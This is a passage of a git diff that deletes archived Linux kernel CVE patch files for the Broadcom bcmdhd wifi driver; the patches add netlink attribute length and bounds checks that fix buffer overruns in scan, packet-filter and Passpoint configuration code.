-+		case GSCAN_ATTRIBUTE_REPORT_EVENTS:
-+			if (nla_len(cur) != sizeof(uint32)) {
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			ch_bucket[num].report_flag = (uint8)nla_get_u32(cur);
-+			break;
-+		case GSCAN_ATTRIBUTE_BUCKET_STEP_COUNT:
-+			if (nla_len(cur) != sizeof(uint32)) {
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			ch_bucket[num].repeat = (uint16)nla_get_u32(cur);
-+			break;
-+		case GSCAN_ATTRIBUTE_BUCKET_MAX_PERIOD:
-+			if (nla_len(cur) != sizeof(uint32)) {
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			ch_bucket[num].bucket_max_multiple =
-+				nla_get_u32(cur) / MSEC_PER_SEC;
-+			break;
-+		default:
-+			WL_ERR(("unknown attr type:%d\n", type));
-+			err = -EINVAL;
-+			goto exit;
-+		}
-+	}
-+
-+exit:
-+	return err;
-+}
-+
-+static int
-+wl_cfgvendor_set_scan_cfg(struct wiphy *wiphy, struct wireless_dev *wdev,
-+			  const void  *data, int len)
- {
- 	int err = 0;
- 	struct bcm_cfg80211 *cfg = wiphy_priv(wiphy);
- 	gscan_scan_params_t *scan_param;
- 	int j = 0;
--	int type, tmp, tmp1, tmp2, k = 0;
--	const struct nlattr *iter, *iter1, *iter2;
--	struct dhd_pno_gscan_channel_bucket  *ch_bucket;
-+	int type, tmp;
-+	const struct nlattr *iter;
- 
- 	scan_param = kzalloc(sizeof(gscan_scan_params_t), GFP_KERNEL);
- 	if (!scan_param) {
- 		WL_ERR(("Could not set GSCAN scan cfg, mem alloc failure\n"));
- 		err = -EINVAL;
- 		return err;
--
- 	}
- 
- 	scan_param->scan_fr = PNO_SCAN_MIN_FW_SEC;
-@@ -537,77 +627,61 @@ static int wl_cfgvendor_set_scan_cfg(struct wiphy *wiphy,
- 			break;
- 
- 		switch (type) {
--			case GSCAN_ATTRIBUTE_BASE_PERIOD:
--				scan_param->scan_fr = nla_get_u32(iter)/1000;
--				break;
--			case GSCAN_ATTRIBUTE_NUM_BUCKETS:
--				scan_param->nchannel_buckets = nla_get_u32(iter);
--				break;
--			case GSCAN_ATTRIBUTE_CH_BUCKET_1:
--			case GSCAN_ATTRIBUTE_CH_BUCKET_2:
--			case GSCAN_ATTRIBUTE_CH_BUCKET_3:
--			case GSCAN_ATTRIBUTE_CH_BUCKET_4:
--			case GSCAN_ATTRIBUTE_CH_BUCKET_5:
--			case GSCAN_ATTRIBUTE_CH_BUCKET_6:
--			case GSCAN_ATTRIBUTE_CH_BUCKET_7:
--				nla_for_each_nested(iter1, iter, tmp1) {
--					type = nla_type(iter1);
--					ch_bucket =
--					scan_param->channel_bucket;
-+		case GSCAN_ATTRIBUTE_BASE_PERIOD:
-+			if (nla_len(iter) != sizeof(uint32)) {
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			scan_param->scan_fr = nla_get_u32(iter) / MSEC_PER_SEC;
-+			break;
-+		case GSCAN_ATTRIBUTE_NUM_BUCKETS:
-+			if (nla_len(iter) != sizeof(uint32)) {
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			scan_param->nchannel_buckets = nla_get_u32(iter);
-+			if (scan_param->nchannel_buckets >=
-+			    GSCAN_MAX_CH_BUCKETS) {
-+				WL_ERR(("ncha_buck out of range %d\n",
-+					scan_param->nchannel_buckets));
-+				err = -EINVAL;
-+				goto exit;
-+			}
-+			break;
-+		case GSCAN_ATTRIBUTE_CH_BUCKET_1:
-+		case GSCAN_ATTRIBUTE_CH_BUCKET_2:
-+		case GSCAN_ATTRIBUTE_CH_BUCKET_3:
-+		case GSCAN_ATTRIBUTE_CH_BUCKET_4:
-+		case GSCAN_ATTRIBUTE_CH_BUCKET_5:
-+		case GSCAN_ATTRIBUTE_CH_BUCKET_6:
-+		case GSCAN_ATTRIBUTE_CH_BUCKET_7:
-+			err = wl_cfgvendor_set_scan_cfg_bucket(iter,
-+							       scan_param, j);
-+			if (err < 0) {
-+				WL_ERR(("set_scan_cfg_buck error:%d\n", err));
-+				goto exit;
-+			}
- 
--					switch (type) {
--						case GSCAN_ATTRIBUTE_BUCKET_ID:
--						break;
--						case GSCAN_ATTRIBUTE_BUCKET_PERIOD:
--							ch_bucket[j].bucket_freq_multiple =
--							    nla_get_u32(iter1)/1000;
--							break;
--						case GSCAN_ATTRIBUTE_BUCKET_NUM_CHANNELS:
--							ch_bucket[j].num_channels =
--							     nla_get_u32(iter1);
--							break;
--						case GSCAN_ATTRIBUTE_BUCKET_CHANNELS:
--							nla_for_each_nested(iter2, iter1, tmp2) {
--								if (k >= GSCAN_MAX_CHANNELS_IN_BUCKET)
--									break;
--								ch_bucket[j].chan_list[k] =
--								     nla_get_u32(iter2);
--								k++;
--							}
--							k = 0;
--							break;
--						case GSCAN_ATTRIBUTE_BUCKETS_BAND:
--							ch_bucket[j].band = (uint16)
--							     nla_get_u32(iter1);
--							break;
--						case GSCAN_ATTRIBUTE_REPORT_EVENTS:
--							ch_bucket[j].report_flag = (uint8)
--							     nla_get_u32(iter1);
--							break;
--						case GSCAN_ATTRIBUTE_BUCKET_STEP_COUNT:
--							ch_bucket[j].repeat = (uint16)
--							     nla_get_u32(iter1);
--							break;
--						case GSCAN_ATTRIBUTE_BUCKET_MAX_PERIOD:
--							ch_bucket[j].bucket_max_multiple =
--							     nla_get_u32(iter1)/1000;
--							break;
--					}
--				}
--				j++;
--				break;
-+			j++;
-+			break;
-+		default:
-+			WL_ERR(("Unknown attr type %d\n", type));
-+			err = -EINVAL;
-+			goto exit;
- 		}
- 	}
- 
--	if (dhd_dev_pno_set_cfg_gscan(bcmcfg_to_prmry_ndev(cfg),
--	     DHD_PNO_SCAN_CFG_ID, scan_param, FALSE) < 0) {
--		WL_ERR(("Could not set GSCAN scan cfg\n"));
-+	err = dhd_dev_pno_set_cfg_gscan(bcmcfg_to_prmry_ndev(cfg),
-+					DHD_PNO_SCAN_CFG_ID, scan_param, FALSE);
-+
-+	if (err < 0) {
-+		WL_ERR(("Could not set GSCAN scan cfg error %d\n", err));
- 		err = -EINVAL;
- 	}
- 
-+exit:
- 	kfree(scan_param);
- 	return err;
--
- }
- 
- static int wl_cfgvendor_hotlist_cfg(struct wiphy *wiphy,
diff --git a/Patches/Linux_CVEs/CVE-2016-8455/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8455/ANY/0001.patch
deleted file mode 100644
index e02cc460..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8455/ANY/0001.patch
+++ /dev/null
@@ -1,120 +0,0 @@
-From 068427b76963929b220a4be40cdf77856374df55 Mon Sep 17 00:00:00 2001
-From: Sudhir Kohalli <sudhir.kohalli@broadcom.com>
-Date: Fri, 4 Nov 2016 12:09:19 -0700
-Subject: [PATCH] net: wireless: bcmdhd: Security V: memory overflow in wifi
- driver function __dhd_apf_add_filter
-
-In order to fix the memory overflow added a check
-for APF program_len to verify if the program_len is
-more than the MAX program length. If the APF program_len
-is more than the MAX APF program_len then parse an error.
-This check will avoid memory oveflow issue happening
-in __dhd_apf_add_filter API. APF referes to Android Packet
-filter.
-
-Bug: 32219121
-
-Change-Id: Ibe468dcb51ec4f35c64da4bdc7296130bf145f13
-Signed-off-by: Sudhir Kohalli <sudhir.kohalli@broadcom.com>
----
- drivers/net/wireless/bcmdhd/dhd_linux.c       | 13 ++++++++++-
- drivers/net/wireless/bcmdhd/include/wlioctl.h |  2 ++
- drivers/net/wireless/bcmdhd/wl_cfgvendor.c    | 31 +++++++++++++++++++++++++--
- 3 files changed, 43 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.c b/drivers/net/wireless/bcmdhd/dhd_linux.c
-index 4ce5a2f4663d3..2fd2934a7e851 100644
---- a/drivers/net/wireless/bcmdhd/dhd_linux.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_linux.c
-@@ -9039,13 +9039,24 @@ __dhd_apf_add_filter(struct net_device *ndev, uint32 filter_id,
- 	}
- 
- 	cmd_len = sizeof(cmd);
-+
-+	/* Check if the program_len is more than the expected len
-+	 * and if program is initialized to NULL return here.
-+	 */
-+	if ((program_len > WL_APF_PROGRAM_MAX_SIZE) ||
-+	    (program == NULL)) {
-+		DHD_ERROR(("%s Invalid program_len: %d, program: %pK\n",
-+			__func__, program_len, program));
-+		return -EINVAL;
-+	}
- 	buf_len = cmd_len + WL_PKT_FILTER_FIXED_LEN +
- 		WL_APF_PROGRAM_FIXED_LEN + program_len;
- 
- 	kflags = in_atomic() ? GFP_ATOMIC : GFP_KERNEL;
- 	buf = kzalloc(buf_len, kflags);
- 	if (unlikely(!buf)) {
--		DHD_ERROR(("%s: MALLOC failure, %d bytes\n", __FUNCTION__, buf_len));
-+		DHD_ERROR(("%s: MALLOC failure, %d bytes\n", __func__,
-+			buf_len));
- 		return -ENOMEM;
- 	}
- 
-diff --git a/drivers/net/wireless/bcmdhd/include/wlioctl.h b/drivers/net/wireless/bcmdhd/include/wlioctl.h
-index 50de89bc5a9c6..808a0bfc3e108 100644
---- a/drivers/net/wireless/bcmdhd/include/wlioctl.h
-+++ b/drivers/net/wireless/bcmdhd/include/wlioctl.h
-@@ -3291,6 +3291,8 @@ typedef struct wl_tcp_keep_set {
- 			OFFSETOF(wl_pkt_filter_pattern_listel_t, mask_and_data)
- 
- #define WL_APF_INTERNAL_VERSION 1
-+/* This will be MAX allowable APF program size */
-+#define WL_APF_PROGRAM_MAX_SIZE (2 * 1024)
- #define WL_APF_PROGRAM_FIXED_LEN OFFSETOF(wl_apf_program_t, instrs)
- #define WL_APF_PROGRAM_LEN(apf_program) \
- 	(apf_program->instr_len * sizeof(apf_program->instrs[0]))
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-index d578026885619..5be16a72aa43f 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-@@ -2722,12 +2722,33 @@ wl_cfgvendor_apf_set_filter(struct wiphy *wiphy,
- 	int ret, tmp, type;
- 	gfp_t kflags;
- 
--	/* assumption: length attribute must come first */
-+	if (len <= 0) {
-+		WL_ERR((" Invalid len : %d\n", len));
-+		ret = -EINVAL;
-+		goto exit;
-+	}
- 	nla_for_each_attr(iter, data, len, tmp) {
- 		type = nla_type(iter);
- 		switch (type) {
- 			case APF_ATTRIBUTE_PROGRAM_LEN:
--				program_len = nla_get_u32(iter);
-+				/* check if the iter is valid and program
-+				 * length is not already initialized.
-+				 */
-+				if (nla_len(iter) == sizeof(uint32) &&
-+				   !program_len) {
-+					program_len = nla_get_u32(iter);
-+				} else {
-+					ret = -EINVAL;
-+					goto exit;
-+				}
-+
-+				if (program_len >
-+					WL_APF_PROGRAM_MAX_SIZE) {
-+					WL_ERR(("program len is more "));
-+					WL_ERR(("than expected len\n"));
-+					ret = -EINVAL;
-+					goto exit;
-+				}
- 				if (unlikely(!program_len)) {
- 					WL_ERR(("zero program length\n"));
- 					ret = -EINVAL;
-@@ -2740,6 +2761,12 @@ wl_cfgvendor_apf_set_filter(struct wiphy *wiphy,
- 					ret = -EINVAL;
- 					goto exit;
- 				}
-+				if (nla_len(iter) != program_len) {
-+					WL_ERR(("program_len is not same\n"));
-+					ret = -EINVAL;
-+					goto exit;
-+				}
-+
- 				kflags = in_atomic() ? GFP_ATOMIC : GFP_KERNEL;
- 				program = kzalloc(program_len, kflags);
- 				if (unlikely(!program)) {
diff --git a/Patches/Linux_CVEs/CVE-2016-8456/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8456/ANY/0001.patch
deleted file mode 100644
index 57a46338..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8456/ANY/0001.patch
+++ /dev/null
@@ -1,348 +0,0 @@
-From e5c1b001a822e8b38680655c400e7b3f67cc3323 Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Thu, 10 Nov 2016 15:01:31 -0800
-Subject: [PATCH] net: wireless: bcmdhd: fix buffer overrun in anqpo config
-
-1. memory leak fix when input packet content corrupted.
-2. reduced unnecessary debug messages
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Bug: 32219453
-Change-Id: I0f79310c97571cd46afff29f58f66b17a2471927
----
- drivers/net/wireless/bcmdhd/dhd_linux.c    |   2 +
- drivers/net/wireless/bcmdhd/dhd_pno.c      |   3 +-
- drivers/net/wireless/bcmdhd/dhd_pno.h      |  17 ++--
- drivers/net/wireless/bcmdhd/wl_cfg80211.c  |  14 +++
- drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 141 ++++++++++++++++++++---------
- 5 files changed, 127 insertions(+), 50 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.c b/drivers/net/wireless/bcmdhd/dhd_linux.c
-index 2fd2934a7e851..00201de5de5b8 100644
---- a/drivers/net/wireless/bcmdhd/dhd_linux.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_linux.c
-@@ -8621,6 +8621,7 @@ int dhd_dev_set_whitelist_ssid(struct net_device *dev, wl_ssid_whitelist_t *ssid
- 	return err;
- }
- 
-+#ifdef DHD_ANQPO_SUPPORT
- void * dhd_dev_process_anqpo_result(struct net_device *dev,
- 			const void  *data, uint32 event, int *send_evt_bytes)
- {
-@@ -8628,6 +8629,7 @@ void * dhd_dev_process_anqpo_result(struct net_device *dev,
- 
- 	return (dhd_pno_process_anqpo_result(&dhd->pub, data, event, send_evt_bytes));
- }
-+#endif /* DHD_ANQPO_SUPPORT */
- #endif /* GSCAN_SUPPORT */
- 
- int dhd_dev_set_rssi_monitor_cfg(struct net_device *dev, int start,
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.c b/drivers/net/wireless/bcmdhd/dhd_pno.c
-index 8d6d234cd11b3..a88d1e2e41320 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.c
-@@ -3798,6 +3798,7 @@ dhd_pno_process_epno_result(dhd_pub_t *dhd, const void *data, uint32 event, int
- 	return results;
- }
- 
-+#ifdef DHD_ANQPO_SUPPORT
- void *
- dhd_pno_process_anqpo_result(dhd_pub_t *dhd, const void *data, uint32 event, int *size)
- {
-@@ -3849,7 +3850,7 @@ dhd_pno_process_anqpo_result(dhd_pub_t *dhd, const void *data, uint32 event, int
- 
- 	return result;
- }
--
-+#endif /* DHD_ANQPO_SUPPORT */
- 
- void *dhd_handle_hotlist_scan_evt(dhd_pub_t *dhd, const void *event_data, int *send_evt_bytes,
-       hotlist_type_t type)
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pno.h b/drivers/net/wireless/bcmdhd/dhd_pno.h
-index b61d0fd866364..a0edf54049acf 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pno.h
-+++ b/drivers/net/wireless/bcmdhd/dhd_pno.h
-@@ -98,8 +98,9 @@
- 
- #define CHANNEL_BUCKET_EMPTY_INDEX                      0xFFFF
- #define GSCAN_RETRY_THRESHOLD              3
--#define MAX_EPNO_SSID_NUM                   64
--
-+#define MAX_EPNO_SSID_NUM                  64
-+#define GSCAN_ANQPO_MAX_HS_LIST_SIZE	   16
-+#define ANQPO_MAX_HS_NAI_REALM_SIZE	   256
- #endif /* GSCAN_SUPPORT */
- 
- enum scan_status {
-@@ -351,10 +352,10 @@ typedef struct gscan_results_cache {
- } gscan_results_cache_t;
- 
- typedef struct {
--    int  id;                            /* identifier of this network block, report this in event */
--    char realm[256];                    /* null terminated UTF8 encoded realm, 0 if unspecified */
--    int64_t roamingConsortiumIds[16];   /* roaming consortium ids to match, 0s if unspecified */
--    uint8 plmn[3];                      /* mcc/mnc combination as per rules, 0s if unspecified */
-+	int  id;
-+	char realm[ANQPO_MAX_HS_NAI_REALM_SIZE];
-+	int64_t roamingConsortiumIds[ANQPO_MAX_PFN_HS];
-+	uint8 plmn[ANQPO_MCC_LENGTH];
- } wifi_passpoint_network;
- 
- typedef struct dhd_pno_gscan_capabilities {
-@@ -517,8 +518,10 @@ extern void dhd_dev_gscan_hotlist_cache_cleanup(struct net_device *dev, hotlist_
- extern int dhd_dev_wait_batch_results_complete(struct net_device *dev);
- extern void * dhd_dev_process_epno_result(struct net_device *dev,
-                         const void  *data, uint32 event, int *send_evt_bytes);
-+#ifdef DHD_ANQPO_SUPPORT
- extern void * dhd_dev_process_anqpo_result(struct net_device *dev,
- 	const void  *data, uint32 event, int *send_evt_bytes);
-+#endif /* DHD_ANQPO_SUPPORT */
- extern int dhd_dev_set_epno(struct net_device *dev);
- extern int dhd_dev_flush_fw_epno(struct net_device *dev);
- #endif /* GSCAN_SUPPORT */
-@@ -567,7 +570,9 @@ extern void dhd_gscan_hotlist_cache_cleanup(dhd_pub_t *dhd, hotlist_type_t type)
- extern int dhd_wait_batch_results_complete(dhd_pub_t *dhd);
- extern void * dhd_pno_process_epno_result(dhd_pub_t *dhd, const void *data,
- 	uint32 event, int *size);
-+#ifdef DHD_ANQPO_SUPPORT
- extern void * dhd_pno_process_anqpo_result(dhd_pub_t *dhd, const void *data, uint32 event, int *size);
-+#endif /* DHD_ANQPO_SUPPORT */
- extern void dhd_pno_translate_epno_fw_flags(uint32 *flags);
- extern int dhd_pno_set_epno(dhd_pub_t *dhd);
- extern int dhd_pno_flush_fw_epno(dhd_pub_t *dhd);
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-index a56ba6b82e197..3d70a82adfa5e 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c
-@@ -9423,6 +9423,16 @@ wl_notify_gscan_event(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- 			} else
- 				err = -ENOMEM;
- 			break;
-+		case WLC_E_PFN_SSID_EXT:
-+			ptr = dhd_dev_process_epno_result(ndev, data, event, &send_evt_bytes);
-+			if (ptr) {
-+				wl_cfgvendor_send_async_event(wiphy, ndev,
-+				    GOOGLE_SCAN_EPNO_EVENT, ptr, send_evt_bytes);
-+				kfree(ptr);
-+			} else
-+				err = -ENOMEM;
-+			break;
-+#ifdef DHD_ANQPO_SUPPORT
- 		case WLC_E_PFN_NET_FOUND:
- 			ptr = dhd_dev_process_anqpo_result(ndev, data, event, &len);
- 			if (ptr) {
-@@ -9432,6 +9442,7 @@ wl_notify_gscan_event(struct bcm_cfg80211 *cfg, bcm_struct_cfgdev *cfgdev,
- 			} else
- 				err = -ENOMEM;
- 			break;
-+#endif /* DHD_ANQPO_SUPPORT */
- 		default:
- 			WL_ERR(("Unknown event %d\n", event));
- 			break;
-@@ -10035,7 +10046,10 @@ static void wl_init_event_handler(struct bcm_cfg80211 *cfg)
- 	cfg->evt_handler[WLC_E_PFN_SWC] = wl_notify_gscan_event;
- 	cfg->evt_handler[WLC_E_PFN_BSSID_NET_FOUND] = wl_notify_gscan_event;
- 	cfg->evt_handler[WLC_E_PFN_BSSID_NET_LOST] = wl_notify_gscan_event;
-+	cfg->evt_handler[WLC_E_PFN_SSID_EXT] = wl_notify_gscan_event;
-+#ifdef DHD_ANQPO_SUPPORT
- 	cfg->evt_handler[WLC_E_GAS_FRAGMENT_RX] = wl_notify_gscan_event;
-+#endif /* DHD_ANQPO_SUPPORT */
- 	cfg->evt_handler[WLC_E_ROAM_EXP_EVENT] = wl_handle_roam_exp_event;
- #endif /* GSCAN_SUPPORT */
- 	cfg->evt_handler[WLC_E_RSSI_LQM] = wl_handle_rssi_monitor_event;
-diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-index 5be16a72aa43f..b156660ed053a 100644
---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c
-@@ -939,10 +939,13 @@ static int wl_cfgvendor_epno_cfg(struct wiphy *wiphy,
- 	return err;
- }
- 
-+#ifdef DHD_ANQPO_SUPPORT
- static int wl_cfgvendor_gscan_anqpo_config(struct wiphy *wiphy,
- 	struct wireless_dev *wdev, const void  *data, int len)
- {
--	int err = BCME_ERROR, rem, type, hs_list_size = 0, malloc_size, i = 0, j, k, num_oi, oi_len;
-+	int err = BCME_ERROR, rem, type, malloc_size, i = 0;
-+	uint32 hs_list_size = 0;
-+	int j, k, num_oi, oi_len;
- 	wifi_passpoint_network *hs_list = NULL, *src_hs;
- 	wl_anqpo_pfn_hs_list_t *anqpo_hs_list;
- 	wl_anqpo_pfn_hs_t *dst_hs;
-@@ -953,52 +956,100 @@ static int wl_cfgvendor_gscan_anqpo_config(struct wiphy *wiphy,
- 	char *rcid;
- 
- 	nla_for_each_attr(iter, data, len, rem) {
--		type = nla_type(iter);
--		switch (type) {
--			case GSCAN_ATTRIBUTE_ANQPO_HS_LIST:
--				if (hs_list_size > 0) {
--					hs_list = kmalloc(hs_list_size*sizeof(wifi_passpoint_network), GFP_KERNEL);
--					if (hs_list == NULL) {
--						WL_ERR(("failed to allocate hs_list\n"));
--						return -ENOMEM;
--					}
--				}
--				nla_for_each_nested(outer, iter, tmp) {
--					nla_for_each_nested(inner, outer, tmp1) {
--						type = nla_type(inner);
-+	type = nla_type(iter);
-+	switch (type) {
-+	case GSCAN_ATTRIBUTE_ANQPO_HS_LIST:
-+		if (hs_list) {
-+			err = -EINVAL;
-+			goto exit;
-+		}
-+		if (hs_list_size > GSCAN_ANQPO_MAX_HS_LIST_SIZE) {
-+			err = -EINVAL;
-+			goto exit;
-+		}
-+		if (hs_list_size > 0) {
-+			hs_list = kzalloc(hs_list_size *
-+				sizeof(wifi_passpoint_network), GFP_KERNEL);
-+			if (!hs_list) {
-+				WL_ERR(("failed to allocate hs_list\n"));
-+				return -ENOMEM;
-+			}
-+		}
-+		nla_for_each_nested(outer, iter, tmp) {
-+			if (i == hs_list_size)
-+				break;
-+			nla_for_each_nested(inner, outer, tmp1) {
-+			type = nla_type(inner);
- 
--						switch (type) {
--							case GSCAN_ATTRIBUTE_ANQPO_HS_NETWORK_ID:
--								hs_list[i].id = nla_get_u32(inner);
--								WL_ERR(("%s: net id: %d\n", __func__, hs_list[i].id));
--								break;
--							case GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM:
--								memcpy(hs_list[i].realm,
--								  nla_data(inner), 256);
--								WL_ERR(("%s: realm: %s\n", __func__, hs_list[i].realm));
--								break;
--							case GSCAN_ATTRIBUTE_ANQPO_HS_ROAM_CONSORTIUM_ID:
--								memcpy(hs_list[i].roamingConsortiumIds,
--								  nla_data(inner), 128);
--								break;
--							case GSCAN_ATTRIBUTE_ANQPO_HS_PLMN:
--								memcpy(hs_list[i].plmn,
--								  nla_data(inner), 3);
--								WL_ERR(("%s: plmn: %c %c %c\n", __func__, hs_list[i].plmn[0], hs_list[i].plmn[1], hs_list[i].plmn[2]));
--								break;
--						}
--					}
--					i++;
-+			switch (type) {
-+			case GSCAN_ATTRIBUTE_ANQPO_HS_NETWORK_ID:
-+				if (nla_len(inner) != sizeof(hs_list[i].id)) {
-+					err = -EINVAL;
-+					goto exit;
- 				}
-+				hs_list[i].id = nla_get_u32(inner);
-+				WL_DBG(("%s: net id: %d\n",
-+					__func__, hs_list[i].id));
- 				break;
--			case GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE:
--				hs_list_size = nla_get_u32(iter);
--				WL_ERR(("%s: ANQPO: %d\n", __func__, hs_list_size));
-+			case GSCAN_ATTRIBUTE_ANQPO_HS_NAI_REALM:
-+				if (nla_len(inner) !=
-+					sizeof(hs_list[i].realm)) {
-+					err = -EINVAL;
-+					goto exit;
-+				}
-+				memcpy(hs_list[i].realm, nla_data(inner),
-+				       sizeof(hs_list[i].realm));
-+				WL_DBG(("%s: realm: %s\n",
-+					__func__, hs_list[i].realm));
- 				break;
--			default:
--				WL_ERR(("Unknown type: %d\n", type));
--				return err;
-+			case GSCAN_ATTRIBUTE_ANQPO_HS_ROAM_CONSORTIUM_ID:
-+				if (nla_len(inner) != sizeof(hs_list[i].
-+					roamingConsortiumIds)) {
-+					err = -EINVAL;
-+					goto exit;
-+				}
-+				memcpy(hs_list[i].roamingConsortiumIds,
-+				       nla_data(inner),
-+				       sizeof(hs_list[i].roamingConsortiumIds));
-+				break;
-+			case GSCAN_ATTRIBUTE_ANQPO_HS_PLMN:
-+				if (nla_len(inner) != sizeof(hs_list[i].plmn)) {
-+					err = -EINVAL;
-+					goto exit;
-+				}
-+				memcpy(hs_list[i].plmn,
-+				       nla_data(inner),
-+				       sizeof(hs_list[i].plmn));
-+				WL_DBG(("%s: plmn: %c %c %c\n",
-+					__func__, hs_list[i].plmn[0],
-+					hs_list[i].plmn[1],
-+					hs_list[i].plmn[2]));
-+				break;
-+			}
-+			}
-+			i++;
- 		}
-+		break;
-+	case GSCAN_ATTRIBUTE_ANQPO_HS_LIST_SIZE:
-+		if (nla_len(iter) != sizeof(hs_list_size)) {
-+			err = -EINVAL;
-+			goto exit;
-+		}
-+		hs_list_size = nla_get_u32(iter);
-+		if ((hs_list_size == 0) ||
-+		    (hs_list_size > GSCAN_ANQPO_MAX_HS_LIST_SIZE)) {
-+			WL_ERR(("%s: ANQPO: %d\n", __func__, hs_list_size));
-+			err = -EINVAL;
-+			goto exit;
-+		}
-+		WL_DBG(("%s: ANQPO: %d\n", __func__, hs_list_size));
-+		break;
-+	default:
-+		WL_ERR(("Unknown type: %d\n", type));
-+		err = -EINVAL;
-+		goto exit;
-+	}
-+
- 	}
- 
- 	malloc_size = OFFSETOF(wl_anqpo_pfn_hs_list_t, hs) +
-@@ -1046,7 +1097,7 @@ static int wl_cfgvendor_gscan_anqpo_config(struct wiphy *wiphy,
- 	kfree(hs_list);
- 	return err;
- }
--
-+#endif /* DHD_ANQPO_SUPPORT */
- static int wl_cfgvendor_set_batch_scan_cfg(struct wiphy *wiphy,
- 	struct wireless_dev *wdev, const void  *data, int len)
- {
-@@ -3065,6 +3116,7 @@ static const struct wiphy_vendor_command wl_vendor_cmds [] = {
- 		.flags = WIPHY_VENDOR_CMD_NEED_WDEV | WIPHY_VENDOR_CMD_NEED_NETDEV,
- 		.doit = wl_cfgvendor_set_bssid_blacklist
- 	},
-+#ifdef DHD_ANQPO_SUPPORT
- 	{
- 		{
- 			.vendor_id = OUI_GOOGLE,
-@@ -3073,6 +3125,7 @@ static const struct wiphy_vendor_command wl_vendor_cmds [] = {
- 		.flags = WIPHY_VENDOR_CMD_NEED_WDEV | WIPHY_VENDOR_CMD_NEED_NETDEV,
- 		.doit = wl_cfgvendor_gscan_anqpo_config
- 	},
-+#endif /* DHD_ANQPO_SUPPORT */
- #endif /* GSCAN_SUPPORT */
- 	{
- 		{
-@@ -3233,7 +3286,9 @@ static const struct  nl80211_vendor_cmd_info wl_vendor_events [] = {
- 		{ OUI_GOOGLE, GOOGLE_SCAN_EPNO_EVENT },
- 		{ OUI_GOOGLE, GOOGLE_DEBUG_RING_EVENT },
- 		{ OUI_GOOGLE, GOOGLE_FW_DUMP_EVENT },
-+#ifdef DHD_ANQPO_SUPPORT
- 		{ OUI_GOOGLE, GOOGLE_PNO_HOTSPOT_FOUND_EVENT },
-+#endif /* DHD_ANQPO_SUPPORT */
- 		{ OUI_GOOGLE, GOOGLE_RSSI_MONITOR_EVENT },
- 		{ OUI_GOOGLE, GOOGLE_MKEEP_ALIVE_EVENT }
- };
diff --git a/Patches/Linux_CVEs/CVE-2016-8457/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8457/ANY/0001.patch
deleted file mode 100644
index 57a46338..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8457/ANY/0001.patch
+++ /dev/null
@@ -1,348 +0,0 @@
-From e5c1b001a822e8b38680655c400e7b3f67cc3323 Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Thu, 10 Nov 2016 15:01:31 -0800
-Subject: [PATCH] net: wireless: bcmdhd: fix buffer overrun in anqpo config
-
-1. memory leak fix when input packet content corrupted.
-2. reduced unnecessary debug messages
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Bug: 32219453
-Change-Id: I0f79310c97571cd46afff29f58f66b17a2471927
----
- drivers/net/wireless/bcmdhd/dhd_linux.c    |   2 +
- drivers/net/wireless/bcmdhd/dhd_pno.c      |   3 +-
- drivers/net/wireless/bcmdhd/dhd_pno.h      |  17 ++--
- drivers/net/wireless/bcmdhd/wl_cfg80211.c  |  14 +++
- drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 141 ++++++++++++++++++++---------
- 5 files changed, 127 insertions(+), 50 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.c b/drivers/net/wireless/bcmdhd/dhd_linux.c
-index 2fd2934a7e851..00201de5de5b8 100644
---- a/drivers/net/wireless/bcmdhd/dhd_linux.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_linux.c
-@@ -8621,6 +8621,7 @@ int dhd_dev_set_whitelist_ssid(struct net_device *dev, wl_ssid_whitelist_t *ssid
- 	return err;
- }
- 
-+#ifdef DHD_ANQPO_SUPPORT
- void * dhd_dev_process_anqpo_result(struct net_device *dev,
- 			const void  *data, uint32 event, int *send_evt_bytes)
- {
-@@ -8628,6 +8629,7 @@ void * dhd_dev_process_anqpo_result(struct net_device *dev,
- 
- 	return (dhd_pno_process_anqpo_result(&dhd->pub, data, event, send_evt_bytes));
- }
-+#endif /* DHD_ANQPO_SUPPORT */
- #endif /* GSCAN_SUPPORT */
- 
